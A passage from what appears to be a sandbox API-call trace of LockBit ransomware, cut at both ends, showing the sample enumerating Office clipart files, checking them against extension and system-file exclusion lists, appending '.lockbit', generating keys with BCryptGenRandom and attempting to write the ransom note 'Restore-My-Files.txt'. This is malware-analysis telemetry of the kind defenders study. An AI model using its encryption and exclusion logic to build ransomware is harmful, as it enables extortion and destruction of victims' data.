lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.590] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0287415.WMF") returned 1 [0154.590] lstrcmpiW (lpString1="ntldr", lpString2="J0287415.WMF") returned 1 [0154.590] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0287415.WMF") returned 1 [0154.590] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0287415.WMF") returned -1 [0154.590] lstrcmpiW (lpString1="autorun.inf", lpString2="J0287415.WMF") returned -1 [0154.590] lstrcmpiW (lpString1="thumbs.db", lpString2="J0287415.WMF") returned 1 [0154.590] lstrcmpiW (lpString1="iconcache.db", lpString2="J0287415.WMF") returned -1 [0154.591] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.591] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287415.WMF") returned=".WMF" [0154.591] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.591] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.591] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.592] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.592] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.592] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.592] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.592] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.592] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.592] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.592] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.592] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287415.WMF.lockbit") returned 72 [0154.592] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287415.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287415.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0154.593] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.593] malloc (_Size=0x40068) returned 0x3df0008 [0154.593] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=43020) returned 1 [0154.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.594] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0154.594] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.594] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0154.594] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.600] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287415.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287415.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.600] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.600] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.601] free (_Block=0x1fa2ed8) [0154.601] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287415.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.601] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.602] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.602] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66116650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd6bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0287417.WMF", cAlternateFileName="")) returned 1 [0154.602] lstrcmpiW (lpString1=".", lpString2="J0287417.WMF") returned -1 [0154.602] lstrcmpiW (lpString1="..", lpString2="J0287417.WMF") returned -1 [0154.602] PathFindExtensionW (pszPath="J0287417.WMF") returned=".WMF" [0154.602] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.602] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.602] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.602] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.602] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.602] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.602] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.602] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.602] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.602] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.603] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.603] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.604] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.605] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0287417.WMF") returned 1 [0154.605] lstrcmpiW (lpString1="ntldr", lpString2="J0287417.WMF") returned 1 [0154.605] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0287417.WMF") returned 1 [0154.605] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0287417.WMF") returned -1 [0154.605] lstrcmpiW (lpString1="autorun.inf", lpString2="J0287417.WMF") returned -1 [0154.605] lstrcmpiW (lpString1="thumbs.db", lpString2="J0287417.WMF") returned 1 [0154.605] lstrcmpiW (lpString1="iconcache.db", lpString2="J0287417.WMF") returned -1 [0154.605] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.605] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287417.WMF") returned=".WMF" [0154.605] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.605] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.605] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.605] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.605] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.605] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.605] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.605] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.605] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.605] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.606] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.606] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287417.WMF.lockbit") returned 72 [0154.607] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287417.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287417.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0154.608] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.608] malloc (_Size=0x40068) returned 0x3f70048 [0154.609] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=54972) returned 1 [0154.609] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.610] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0154.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.610] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0154.610] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0154.616] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287417.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287417.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.616] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.616] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.618] free (_Block=0x1fa2ed8) [0154.618] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287417.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.618] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.618] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.618] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82369200, ftCreationTime.dwHighDateTime=0x1bf58e6, ftLastAccessTime.dwLowDateTime=0x66116650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x82369200, ftLastWriteTime.dwHighDateTime=0x1bf58e6, nFileSizeHigh=0x0, nFileSizeLow=0x89a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0287641.JPG", cAlternateFileName="")) returned 1 [0154.618] lstrcmpiW (lpString1=".", lpString2="J0287641.JPG") returned -1 [0154.618] lstrcmpiW (lpString1="..", lpString2="J0287641.JPG") returned -1 [0154.618] PathFindExtensionW (pszPath="J0287641.JPG") returned=".JPG" [0154.618] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0154.618] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0154.618] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0154.618] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0154.618] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0154.619] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0154.619] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0154.619] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0154.619] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0154.619] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0154.619] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0154.619] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0154.619] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0154.619] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0154.619] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0154.619] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0154.619] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0154.619] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0154.619] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0154.619] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0154.619] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0154.619] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0154.619] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0154.619] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0154.619] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0154.619] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0154.619] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0154.620] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0154.620] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0154.620] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0154.620] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0154.620] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0154.620] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0154.620] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0154.620] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0154.620] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0154.620] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0154.620] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0154.620] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0154.620] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0154.620] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0154.620] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0154.620] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0154.620] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0154.620] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0154.620] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0154.620] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0154.620] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0287641.JPG") returned 1 [0154.620] lstrcmpiW (lpString1="ntldr", lpString2="J0287641.JPG") returned 1 [0154.620] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0287641.JPG") returned 1 [0154.621] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0287641.JPG") returned -1 [0154.621] lstrcmpiW (lpString1="autorun.inf", lpString2="J0287641.JPG") returned -1 [0154.621] lstrcmpiW (lpString1="thumbs.db", lpString2="J0287641.JPG") returned 1 [0154.621] lstrcmpiW (lpString1="iconcache.db", lpString2="J0287641.JPG") returned -1 [0154.621] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.621] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287641.JPG") returned=".JPG" [0154.621] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0154.621] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0154.621] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0154.621] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0154.621] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0154.621] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0154.621] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0154.621] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0154.621] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0154.621] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0154.621] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0154.621] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0154.621] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0154.621] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0154.621] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0154.622] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0154.622] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0154.622] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0154.622] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0154.622] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0154.622] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0154.622] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0154.622] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0154.622] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0154.622] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0154.622] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0154.622] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0154.622] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0154.622] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287641.JPG.lockbit") returned 72 [0154.622] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287641.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287641.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0154.635] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.635] malloc (_Size=0x40068) returned 0x1ff1e60 [0154.635] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=35236) returned 1 [0154.635] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.636] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.636] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0154.636] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.637] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.637] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0154.637] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.640] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287641.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287641.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.640] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.640] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.642] free (_Block=0x1fa2ed8) [0154.642] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287641.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.642] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.642] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.642] FindNextFileW (in: hFindFile=0x55fe38, 